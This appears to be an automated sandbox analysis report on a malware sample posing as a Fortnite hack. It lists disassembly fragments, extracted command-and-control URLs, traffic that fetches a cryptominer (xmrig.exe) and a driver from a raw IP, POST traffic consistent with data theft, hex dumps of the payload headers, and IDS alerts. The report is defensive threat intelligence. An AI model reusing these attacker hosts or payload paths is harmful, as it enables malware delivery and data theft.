Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-264E2432h]	2_2_0044A03F
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h	2_2_00449915
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+425D4A5Fh]	2_2_00412299
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+08h]	2_2_0044BB00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0000027Ch]	2_2_00437C16
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6E74889Ah	2_2_0044D430
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E0h]	2_2_004114A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000E8h]	2_2_0041DD7B
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+55h]	2_2_00412500
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+5726EBF0h]	2_2_00412500
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6E74889Ah	2_2_0044D630
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3Ch]	2_2_00420F00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_00420F00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6867D84Eh]	2_2_0042387C
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_00436001
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	2_2_0044B810
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+08h]	2_2_00420819
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	2_2_00420819
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then jmp eax	2_2_0041F8F7
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-00000086h]	2_2_004320FE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6867D84Eh]	2_2_00423893
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov dword ptr [esp+20h], 161E1016h	2_2_00433177
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-48h]	2_2_00448130
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh	2_2_00444930
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_004359DC
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov word ptr [edi], cx	2_2_00429190
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_00431278
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+10h]	2_2_00431278
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_00431A2E
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+10h]	2_2_00431A2E
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00433AD0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	2_2_0041BAD4
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	2_2_00447B50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov ebp, eax	2_2_00408B60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00437315
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00437319
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00437319
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A3E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A3E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 7A542AABh	2_2_0044C3F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00435B86
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	2_2_00430390
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-4C8D577Ch]	2_2_00430390
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5E6803F4h]	2_2_00437BAF
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00435BB7
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+03h]	2_2_00424450
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_00428C50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00435C00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00436C10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	2_2_00436C10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-48h]	2_2_00447CA0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00436CA9
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	2_2_00436CA9
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+07h]	2_2_00423CB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov eax, ebx	2_2_00423CB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00410D42
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00410D42
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then push eax	2_2_0044955F
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+374EA572h]	2_2_00447D60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-44h]	2_2_00447D60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00440520
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00436D82
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	2_2_00436D82
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], edi	2_2_00445651
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	2_2_00432E70
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00437E32
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]	2_2_0042D6D1
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0042D6D1
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+30E8921Eh]	2_2_0040C6E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then jmp eax	2_2_00412F3E
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4E335D46h]	2_2_00431FC0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-264E241Ah]	2_2_0044BFE0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-264E241Ah]	2_2_0044BFE0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041A790
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041FFA6
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_03154668

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic

TCP traffic: 192.168.2.12:60050 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:35:36 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:35:41 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:35:41 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49684 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49688 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49692 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49699 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49698 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49697 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49702 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.12:49705 -> 185.215.113.51:80

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GY1cY90wj17rafBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14512Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4i02DMxRAHB9Cf1G71User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G3ze21wP3um4p7CE0vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20247Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QOjjdCtxM2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2413Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=a6vn7CLPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550998Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 95Host: citydisco.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
